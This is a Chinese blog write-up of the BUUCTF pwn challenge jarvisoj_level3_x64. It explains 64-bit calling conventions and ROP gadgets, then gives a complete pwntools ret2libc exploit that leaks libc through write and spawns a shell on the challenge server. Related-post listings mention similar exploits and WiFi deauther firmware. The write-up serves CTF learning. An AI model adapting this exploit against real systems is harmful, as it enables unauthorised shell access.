BUUCTF(pwn)jarvisoj_level3_x64

最新推荐文章于 2023-10-25 10:22:30 发布
最新推荐文章于 2023-10-25 10:22:30 发布
阅读量431 收藏 2
点赞数 1
分类专栏: pwn题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_45556441/article/details/115383250
版权

在这里插入图片描述
这道题是一道简单的rop类型的题目,跟之前做的题目有一些差异:( 这是64位的需要一些额外的操作 )

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

64位汇编传参,当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时, 前 6 个与前面一样, 但后面的依次从 “右向左” 放入栈中,即和32位汇编一样。

这里我们使用 write 函数 来泄密 libc地址

ssize_t write(int fd,const void*buf,size_t count); 参数说明:
fd:是文件描述符(write所对应的是写,即就是1) buf:通常是一个字符串,需要写入的字符串 count:是每次写入的字节数

write 函数的特殊之处是 它具有多个参数;

这里我们需要获得3个寄存器的地址来 存取参数;
在这里插入图片描述
在这里插入图片描述rdi = 0x4006b3

rsi = 0x4006b1

这里 rsi 这个地址后面还跟着一个 寄存器 r15; 刚好够了3个寄存器 来供我们输入参数;

下面就是一些基本的ropexp;

from pwn import *
from LibcSearcher import *
r=remote('node3.buuoj.cn',29161)
elf=ELF("./1")
write_plt=elf.plt["write"]
write_got=elf.got["write"]
main=0x40061A
rdi=0x4006b3
rsi=0x4006b1
payload='a'*(0x80+0x8)+p64(rdi)+p64(1)+p64(rsi)+p64(write_got)+p64(8)+p64(write_plt)+p64(main)
r.sendlineafter("Input:\n",payload)
write_addr = u64(r.recv(8))
libc=LibcSearcher('write',write_addr)
offset=write_addr-libc.dump('write')
sys=offset+libc.dump('system')
binsh=offset+libc.dump('str_bin_sh')
payload='a'*(0x80+0x8)+p64(rdi)+p64(binsh)+p64(sys)
r.sendlineafter("Input:\n",payload)
r.interactive()

对exp有疑问的欢迎留言

半岛铁盒@
关注
  • 1
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
BUUCTF----jarvisoj_level3_x64
qq_33010875的博客
09-26 455
环境:WSL2,ubuntu16.04,python2 checksec文件: 这道题level3的思路一样,只是32位的程序改成了64位。 也就是说,在利用write函数泄露出libc的基地址时,需要用到寄存器来穿参数,write有三个参数,所以需要rdi,rsi,rdx三个寄存器,通过命令: ROPgadget --binary level3_x64 |grep "pop" 结果: 从图中可以看到只找到了rdi和rsi寄存器,没有rdx寄存器 尝试gdb程序: 在read函数下断点,可以看到rd
BUUCTFjarvisoj_level3_x64(write up)
qq_44768749的博客
08-24 879
BUUCTFjarvisoj_level3_x640x01 文件分析0x02 运行0x03 IDA0x04 思路0x05 exp 0x01 文件分析 64位程序,仅开启栈不可执行保护 0x02 运行 输入一个字符串 0x03 IDA 字符串可输入长度可造成栈溢出 0x04 思路 没有提供system函数和"/bin/sh"的地址 第一次栈溢出泄露read函数地址来得到libc版本,从而获取system函数和"/bin/sh"的地址,并且返回主函数 这里有个难点就是参数需要放到对应
jarvisoj_level3_x64
qq_62887641的博客
09-21 172
64位,只开了nx栈溢出。
[BUUCTF]PWN——jarvisoj_level3_x64
BangSen1的博客
03-17 234
jarvisoj_level3_x64 例行检查,64位,开启NX保护。 运行一下。 IDA打开,查看main函数 function()函数 buf溢出漏洞,read之前已经调用过write函数,利用它来泄露libc版本 64位程序在传参的时候要先用到rdi,rsi,rdx,rcx,r8,r9这几个寄存器,都满了之后才会在栈上传参 利用ROPgadget找一下设置寄存器的指令 rdi=0x4006b3 rsi_r15=0x4006b1 payload='a'*(0x80+8)+p64(rdi)+
JarvisOJ level3_x64
PLpa的博客
07-09 998
这题和level3大同小异,只不过这一题是x64的程序 做这题之前,建议先写level2。 拿到这题,我们首先查看保护: 程序只开了NX保护,好的。 根据做过level3的经验,我们先找出我们需要的地址(也可以用pwntools工具自动找): vul()函数: write()函数的plt地址: 之后我们找齐需要用的gadget: 但是我们并没有找到pop rdx ; ret,根据我们对w...
[BUUCTF-pwn]——jarvisoj_level3_x64
最新发布
Y_peak的博客
10-25 261
简单的ret2libc通过vuln函数,我们可以看出程序中包含write和read函数,同时存在栈溢出。通过write泄露read的got表地址。进而获得libc,重新控制代码再次进行栈溢出即可获得shell。
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
jarvisoj_add
05-14
jarvisoj_add,mips架构下的pwn题。
PWN.rar_AVR PWM_GPS FPGA_PWN_avr_avr pwn
09-23
【标题】"PWN.rar" 是一个包含与 AVR 单片机、PWM 脉冲输出、GPS 和 FPGA 相关资源的压缩包。其中,"AVR_PWM_GPS_FPGA_PWN_avr_avr_pwn" 可能是项目或文件集合的命名,暗示了这些技术的综合应用。 【描述】描述指出...
Wi-PWN_8.0_ENGLISH.bin
08-25
ESP8266的WIFI杀手固件,这是不带显示的。 我后续更新带OLED显示的固件。教程后将更新。
Wi-PWN_8.0_ENGLISH_OLED.bin
08-25
这是ESP8266的带OLED显示的WIFI杀手固件。
BUUCTF jarvisoj_level3
红叶的博客
10-27 327
切入点从泄露write函数入手。栈溢出漏洞,ret2libc。IDA Pro 静态调试。
BUUCTF--pwn--jarvisoj_level3【ret2libc】
qq_73149934的博客
12-04 294
BUUCTF--pwn--jarvisoj_level3
BUUCTF--pwn--jarvisoj_level3_x64【ret2libc_64】
qq_73149934的博客
12-05 560
BUUCTF--pwn--jarvisoj_level3_x64
[BUUCTF]PWN——jarvisoj_level3
mcmuyanga的博客
10-28 788
jarvisoj_level3 附件 步骤 例行检查,32位,nx保护 运行一下程序 32位ida载入,shift+f12没有看到程序里有可以直接利用的后面函数,根据运行时的字符串找到了程序的关键函数 参数buf明显的溢出漏洞,使用ret2libc的办法去获取shell 利用过程: 0x1 利用wire函数泄露libc版本 write_plt=elf.plt['write'] write_got=elf.got['write'] payload='a'*(0x88+4)+p32(write_p
buuctf jarvisoj_level3_x641
qq_73625550的博客
05-14 487
ret2libc,利用libcsearcher获取libc版本
BUUCTF-----actf_2019_babyheap (UAF)
半岛铁盒的博客
06-15 6205
这道题和之前做的 hitcontraining_uaf 这道题类似 64位程序,没开PIE 并且这里发现了 bin/sh 字符串
jarvisoj_level1
08-28
- *1* *3* [[BUUCTF-pwn]——jarvisoj_level1](https://blog.csdn.net/Y_peak/article/details/114916604)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

半岛铁盒@

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值